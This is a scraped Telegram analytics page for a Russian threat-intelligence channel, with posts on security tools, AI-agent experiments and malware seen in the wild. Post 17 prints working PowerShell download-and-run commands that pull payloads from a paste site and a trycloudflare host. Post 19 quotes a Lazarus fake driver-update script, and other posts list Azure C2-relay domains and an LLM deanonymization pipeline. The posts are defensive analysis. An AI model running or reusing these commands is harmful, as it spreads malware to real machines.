ar
Feedback
Secure Lemur

Secure Lemur

الذهاب إلى القناة على Telegram

Threat Intelligence,Threat Hunting, Информационная безопасность и прочее полезное. Все исключительно в познавательных целях. 🕸️EASM: @tinyscope Чат для обсуждений: @threat_chat

إظهار المزيد
2 536
المشتركون
-824 ساعات
+27 أيام
+2530 أيام

جاري تحميل البيانات...

سحابة العلامات
لا توجد بيانات
هل تواجه مشاكل؟ يرجى تحديث الصفحة أو الاتصال بمدير الدعم الخاص بنا.
الإشارات الواردة والصادرة
---
---
---
---
---
---
جذب المشتركين
سبتمبر '26
سبتمبر '26
+67
في 0 قنوات
أغسطس '26
+92
في 1 قنوات
Get PRO
يوليو '26
+88
في 0 قنوات
Get PRO
يونيو '26
+95
في 0 قنوات
Get PRO
مايو '26
+76
في 0 قنوات
Get PRO
أبريل '26
+66
في 0 قنوات
Get PRO
مارس '26
+124
في 0 قنوات
Get PRO
فبراير '26
+102
في 0 قنوات
Get PRO
يناير '26
+112
في 0 قنوات
Get PRO
ديسمبر '25
+116
في 4 قنوات
Get PRO
نوفمبر '25
+99
في 0 قنوات
Get PRO
أكتوبر '25
+79
في 1 قنوات
Get PRO
سبتمبر '25
+90
في 0 قنوات
Get PRO
أغسطس '25
+129
في 1 قنوات
Get PRO
يوليو '25
+133
في 1 قنوات
Get PRO
يونيو '25
+85
في 0 قنوات
Get PRO
مايو '25
+101
في 3 قنوات
Get PRO
أبريل '25
+88
في 0 قنوات
Get PRO
مارس '25
+102
في 1 قنوات
Get PRO
فبراير '25
+83
في 0 قنوات
Get PRO
يناير '25
+111
في 0 قنوات
Get PRO
ديسمبر '24
+166
في 1 قنوات
Get PRO
نوفمبر '24
+264
في 0 قنوات
Get PRO
أكتوبر '24
+92
في 1 قنوات
Get PRO
سبتمبر '24
+99
في 3 قنوات
Get PRO
أغسطس '24
+94
في 3 قنوات
Get PRO
يوليو '24
+77
في 1 قنوات
Get PRO
يونيو '24
+89
في 1 قنوات
Get PRO
مايو '24
+79
في 2 قنوات
Get PRO
أبريل '24
+116
في 0 قنوات
Get PRO
مارس '24
+92
في 0 قنوات
Get PRO
فبراير '24
+98
في 1 قنوات
Get PRO
يناير '24
+108
في 2 قنوات
Get PRO
ديسمبر '23
+286
في 2 قنوات
Get PRO
نوفمبر '230
في 0 قنوات
Get PRO
أكتوبر '230
في 0 قنوات
Get PRO
سبتمبر '23
+673
في 0 قنوات
التاريخ
نمو المشتركين
الإشارات
القنوات
17 سبتمبر+3
16 سبتمبر+2
15 سبتمبر+7
14 سبتمبر+2
13 سبتمبر+10
12 سبتمبر+5
11 سبتمبر+2
10 سبتمبر+1
09 سبتمبر+4
08 سبتمبر+6
07 سبتمبر+8
06 سبتمبر+3
05 سبتمبر+2
04 سبتمبر+1
03 سبتمبر+3
02 سبتمبر+4
01 سبتمبر+4
منشورات القناة
В проекте по добычи данных из API токенов Telegram ботов (упоминал тут) появились обновления. Soxoj его доработал - теперь там есть графический интерфейс и пофикшены баги с выгрузкой. Все еще самая удобная тулза для исследования телеграм ботов. ➡️ github.com/soxoj/telegram-bot-dumper@seclemur |❤@threat_chat

2
У всех после выхода Astra началось нещадное потребление токенов и на 5.6 моделях тоже? Раньше для моих задач я даже 5ч лимита не исчерпывал, а сейчас молюсь чтобы на полчаса хватало 5.6 Sol. Есть ли лайфхаки как предотвратить это? Знаю про codegraph, но может есть и другие способы , пишите ⬇️ у меня есть гипотеза что это все для того чтобы нищеброды за 20$ переходили на бесплатную версию и им показывали рекламу,а бояре с PRO подпиской пользовались токенами также спокойно в свое удовольствие😂
376
3
لا يوجد نص...
441
4
Планирую быть завтра на offzone - пишите Буду рад пообщаться 🤝
635
5
Напоминаю про лайфхак с ученической почтой ✍🏼
733
6
Shodan снова раздает пожизненный membership за 5$. Еще успеваешь 📈 ❤@seclemur |❤ @threat_chat
Shodan снова раздает пожизненный membership за 5$. Еще успеваешь 📈 ❤@seclemur |❤ @threat_chat
790
7
Как говорится - любой уважающий себя AI-TI энтузиаст начинает парсить новости и статьи. Вот и я поигрался с промптами и Herme
Как говорится - любой уважающий себя AI-TI энтузиаст начинает парсить новости и статьи. Вот и я поигрался с промптами и Hermes и карманную TI платформу в Obsidian. Скормил ему побольше разных TI блогов вендоров, описал что и в каком формате хочу получать: так чтобы между страницами хранилища obsidian была перелинковка сущностей в случае если они связаны. С таким же успехом можно просить его делать другие аутпуты, например, STIX и грузить в нужные системы (OpenCTI). Промежуточный итог на видео. Особой практической пользы для меня в этом нет, но поиграться было интересно. Затраты: 1 час времени 15$ на написание скиллов + ~10$ на сам парсинг текста и оставил где-то на 10 дней собирать из RSS репорты какие сможет отловить. Модели: deepseek-v4-pro для общения с агентом и написания скиллов deepseek-v4-flash для обработки текста статей (подешевле чтоб было) ❤@seclemur |❤ @threat_chat
377
8
Пссс, тут вакансия открыта: https://hh.ru/vacancy/133732099 Поиск Threat Intelligence аналитика с большим желанием искать и изучать новые киберугрозы. Важен опыт именно изучения и поиск чего-то нового и неизвестного. Различные пет-проекты для превентивного хантинга сэмплов, сетевой инфраструктуры приветствуется и в почете - если таковой опыт имеется обязательно упомяни в сопроводительном письме. Если ты младший, но считаешь что можешь удивить, то тоже не стесняйся откликаться.
692
9
Пока промежуточный итоги такие: 1) AI агенты как таковые - это топ, концепция очень нравится. 2) OpenClaw невозможно лагающее создание. Админить его тяжело, пришлось сносить 3) Спасибо @poxek за рекомендацию в чате. Поставил hermes - работает на порядки стабильнее. Но, наверное, следующий этап это написание своего агента. продолжаю тестировать, докручиваем с агентом скиллы, надеюсь получится кое-что интересное. ❤@seclemur |❤ @threat_chat
391
10
Я буду, приходите тоже :)
522
11
Всем привет 👋. Инсека и Технологии киберугроз приглашают вас на CTI meetup #5. 🍻 обсуждаем рабочие моменты, делимся опытом
Всем привет 👋. Инсека и Технологии киберугроз приглашают вас на CTI meetup #5. 🍻 обсуждаем рабочие моменты, делимся опытом 📆 23 мая, 14:00-20:00 📍 Место: Лофт «Москва» по адресу Москва, Берсеневская набережная, 6с3 Программа CTI meetup #5: Сбор гостей 13:30-14:00 Начало выступлений 14:00 1. Threat Hunting в опенсорсе: злоумышленники используют ИИ, мы тоже, но есть нюанс Раковский Станислав (руководитель группы Supply Chain Security в Positive Technologies) 2. Хватит «приручать фиды»: что реально работает в телекоме Елютин Павел (руководитель направления анализа киберугроз, Билайн) Снежков Александр (эксперт по анализу киберугроз, Билайн) 3. Докладчик уточняется 🍻 Кофе-брейк 15:30-16:00 4. Практический CTI 2.0: добро пожаловать в Cyberpunk. Ну почти. Мешков Андрей (независимый эксперт) 5. Квиз ✌️17:00-20:00 С вас общение, с нас пиво. Мы рады будем видеть всех желающих, но к сожалению, количество мест ограничено размерами помещения. 👉🏼 Зарегистрироваться
475
12
Сделал скилл который по плану будет детектить малварные C2 на потоке. Если будет адекватно работать, то сделаю отдельный кана
Сделал скилл который по плану будет детектить малварные C2 на потоке. Если будет адекватно работать, то сделаю отдельный канальчик с фидами как раньше было в @tinyscope. Обзаведусь недостающими ключами к search engines и поставлю на поток. Сейчас решил добавить Shodan, FOFA, Zoomeye, Netlas. Какие еще предложения ? + может кто поделится готовыми рулями к таким поисковикам, буду рад перенять вашу опыт и мудрость. Из полезного знаю такие ресурсы - ссылка1 ссылка2
446
13
Следом другая статья, но тоже про агентов и безопасность. Это исследование про беспрерывную деанонимизацию пользователей с по
Следом другая статья, но тоже про агентов и безопасность. Это исследование про беспрерывную деанонимизацию пользователей с помощью LLM. То, что раньше требовало часов ручной работы OSINT-аналитика, теперь можно автоматизировать и поставить на поток😐 Ресерчеры рассказывают как они с помощью агентов и инструментов для них построили целый пайплайн по деанону пользователей: 1️⃣ Extract – из постов в социальных сетях пользователя модель вытаскивает сырые факты: город, работа, образование, хобби, события. 2️⃣ Search – LLM генерирует поисковые запросы на основе собранных данных и ищет похожих кандидатов в интернете. 3️⃣ Reason – сопоставляет найденные профили с извлечёнными фактами семантически. 4️⃣ Calibrate – оценивает уверенность и отбрасывает слабые совпадения. LLM одновременно анализирует, ищет и сопоставляет информацию. Это позволяет автоматизировать деанонимизацию и работать в масштабе, что раньше делал только человек. Как-будто бы анонимность закончилась на некоторое время. Теперь если ты хочешь быть анонимным в интернете придется делать poisoning своих данных и использовать прочие уязвимости/слабости чтобы испортить LLM работу. ❤@seclemur |❤ @threat_chat
508
14
Теперь вы будете встречать меня на VT чаще. Я теперь нейрослоп 💃 А я всего лишь попросил его научиться отправлять комменты к
Теперь вы будете встречать меня на VT чаще. Я теперь нейрослоп 💃 А я всего лишь попросил его научиться отправлять комменты к индикаторам на VT, если в статье он находит какие-то IoC.
423
15
Наконец приступил к тестированию нашумевшего OpenClaw. С горем пополам,но развернул у себя его на домашней машине для тестов+1
Наконец приступил к тестированию нашумевшего OpenClaw. С горем пополам,но развернул у себя его на домашней машине для тестов 😂 Сходу испытал детский восторг - штука невероятно адаптивная и очень гибкая. Выше скриншоты буквально сразу после первоначальной настройки. А сколько еще всего впереди. Безусловно прежде чем запускать его проштудировал кучу постов в твиттере на тему того как он все удаляет и ломает. Морально к этому готов🤩 Основная гипотеза для проверки - можно ли с околонулевыми знанями в AI агентах сделать из него полноценного TI-аналитика-помощника, способного анализировать отчеты и делать расследования на потоке. А можем в ходе изучения появятся дополнительные мысли. На старте план такой: Скинул в него IoC -> он пробежался по всем источникам что у него есть и собрал отчет по нему, а также дал какие-то рекомендации. Спойлер - научить его этому дело 5 минут. И ноль строчек кода самостоятельно написанных. Интересна ли эта тема, нужно ли освещать ее чаще? В целом, если были какие-то интересные идеи как использовать агента, но у тебя не доходили руки разобраться/протеститровать, то можно писать их в комменты, а я попробую это реализовать 👇 ❤@seclemur |❤ @threat_chat
447
16
Не совсем тематика этого канала, но тоже важно подстветить. В прошлый раз затронулась тема про то как разгрузить голову. В эт
Не совсем тематика этого канала, но тоже важно подстветить. В прошлый раз затронулась тема про то как разгрузить голову. В этот раз я тоже не с пустыми руками. Нашел исследование которое точно объясняет, почему рабочий день часто ощущается как «работал, но ничего не сделал». Суть статьи в том что продуктивность зависит не от силы воли, а от трёх вещей: как часто тебя отвлекают, сколько времени уходит на возвращение в задачу и какой минимальный непрерывный отрезок нужен, чтобы вообще получить результат. Каждый раз, когда отвлекаешься (например, проверка соцсетей или ответ на сообщение в чате), мозгу нужно время, чтобы вернуться в рабочий ритм. Исследования автора показывают, что на восстановление фокуса может уходить до 23 минут. С помощью математических формул автор посчитал, каковы шансы в 100 рабочих днях найти три цельных 60-минутных отрезка: • если отвлекаться 1 раз в час — 70%, • если прерываться 2 раза в час, вероятность сокращается в 5 раз. Самый забавный вывод - при частых прерываниях (например, каждые 3–5 минут) глубокая работа становится математически почти невозможной (!). А теперь вспомни как часто сыпятся уведомления или когда случайно открываешь телеграм и видишь непрочитанный пост в канале что не читал уже два года. Замьютил несколько месяцев назад все чаты и приложения - стал более концентрированным и спокойным😋 Нет у тебя модного СДВГ, это просто обстоятельства в которых мы все живем. Исследование Другая полезная статья на русском ❤@seclemur |❤ @threat_chat
496
17
Иногда приходится и такие атаки изучать (видео 👆😁) LNK файл с командой, которая качала видео пару недель назад: -c "$b=(irm
Иногда приходится и такие атаки изучать (видео 👆😁) LNK файл с командой, которая качала видео пару недель назад: -c "$b=(irm https://pastes.io/raw/aaaaigz0ex);[IO.File]::WriteAllBytes(\"$env:TEMP\v.mp4\",[Convert]::FromBase64String($b));start $env:TEMP\v.mp4" Но забавно что сейчас на этом пастбине висит другой скрипт: if (!(Test-Path "$env:LOCALAPPDATA\Discord\*\Discord.exe") -and !(Get-PSDrive -PSProvider FileSystem | ForEach-Object { Get-ChildItem -Path $_.Root -Filter "Discord.exe" -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1 })) { exit } Invoke-WebRequest -OutFile $env:AppData\RuntimeBroker.exe -Uri https://enjoyed-hop-definitions-tee.trycloudflare.com/64.exe start $env:AppData\RuntimeBroker.exe Интересно что это за аудитория, которую таргетят путем поиска дискорда на машине. Вероятно та же аудитория, что и писала этот скрипт😂 Пейлоад, увы, уже не доступен. VirusTotal ❤@seclemur |❤ @threat_chat
504
18
Ультимативный гайд по организации инфраструктуры для пентестов - тык Много интересных мыслей есть и для исследователей угроз.
Ультимативный гайд по организации инфраструктуры для пентестов - тык Много интересных мыслей есть и для исследователей угроз. Но глава о CDN Relays особенно понравилась. Недавно натыкался на несколько примеров реальных атак, где злоумышленники использовали инфраструктуру Microsoft Azure в качестве командного центра. Главного загвоздка этой техники заключается в том, что домены от облачных сервисов микромягких чаще всего от греха подальше в вайтлистах и теряются в огромном потоке телеметрии, которую отправляет Windows на свои сервера. Попробуйте запустить машину хотя бы в том же самом Any.Run и посмотрите на количество улетевших данных просто потому что система запустилась😂 Тем самым всего за пару баксов аренды пэнтестеры прячут свое сетевое взаимодействие в легитимном трафике. Ниже список доменов облачных сервисов Azure, за трафиком в сторону которых стоит присматривать бдительнее: *.accesscontrol.windows.net *.graph.windows.net *.onmicrosoft.com *.azure-api.net *.biztalk.windows.net *.blob.core.windows.net *.cloudapp.net *.cloudapp.azure.com *.azurecr.io *.azurecontainer.io *.vo.msecnd.net *.cosmos.azure.com *.documents.azure.com *.file.core.windows.net *.azurefd.net *.vault.azure.net *.azmk8s.io *.management.core.windows.net *.origin.mediaservices.windows.net *.azure-mobile.net *.queue.core.windows.net *.servicebus.windows.net *.database.windows.net *.azureedge.net *.table.core.windows.net *.trafficmanager.net *.azurewebsites.net *.visualstudio.com ❤@seclemur |❤ @threat_chat
701
19
Попалась очередная атака от Lazarus. Сайт для прохождения собеседований. В данном случае на позицию маркетолога. После прохож+2
Попалась очередная атака от Lazarus. Сайт для прохождения собеседований. В данном случае на позицию маркетолога. После прохождения опроса из нескольких задач для успешного видеозвонка просит обновить драйвера, открыв командную строку и вставив нужную команду. Все бы ничего, да только в буфер обмена приходит немного расширенная команда, скачивающая полезную нагрузку 😂 Забавный момент: для симуляции установки драйверов запускается vbs скрипт с таким содержанием: Set objShell = CreateObject("WScript.Shell") Set objFSO = CreateObject("Scripting.FileSystemObject") objShell.Run "cmd /c title NVIDIA Display Driver Update Utility", 0, False objShell.Run "cmd /c color 0A", 0, False objShell.Run "cmd /c cls", 0, False WScript.Echo "" WScript.Echo "================================================" WScript.Echo " NVIDIA Display Driver Update Utility" WScript.Echo "================================================" WScript.Echo "" WScript.Echo "[INFO] Scanning for compatible hardware..." WScript.Sleep 333 WScript.Echo "[INFO] Detected: NVIDIA GeForce Graphics Adapter" WScript.Sleep 1167 WScript.Echo "[INFO] Current driver version: 536.99" WScript.Sleep 500 WScript.Echo "[INFO] Available driver version: 581.80 (WHQL)" WScript.Echo "" WScript.Sleep 400 WScript.Echo "[STEP 1/5] Preparing driver installation..." WScript.Sleep 2330 WScript.Echo " Status: Checking system compatibility" Call AnimateDots(3, 50, 150) WScript.Echo " OK" WScript.Sleep 667 WScript.Echo " Status: Verifying disk space" Call AnimateDots(3, 80, 200) WScript.Echo " OK (2.1 GB required)" WScript.Sleep 167 WScript.Echo " Status: Creating system restore point" Call AnimateDots(4, 50, 150) WScript.Echo " OK" WScript.Sleep 67 WScript.Echo " Status: Preparation completed" WScript.Echo "" WScript.Sleep 67 Почитать про подобные киллчейны от этой группировки и их деанон можно тут - ссылка IOCs: breezyhr[.us api.bitken[.cloud 93.127.215[.188 187.77.220[.50 ❤@tinyscope | ❤@seclemur |❤ @threat_chat
616
20
Системный промпт он тоже отдает без проблем 😁 оставил в комментариях посмотреть 👇🏼
Системный промпт он тоже отдает без проблем 😁 оставил в комментариях посмотреть 👇🏼
460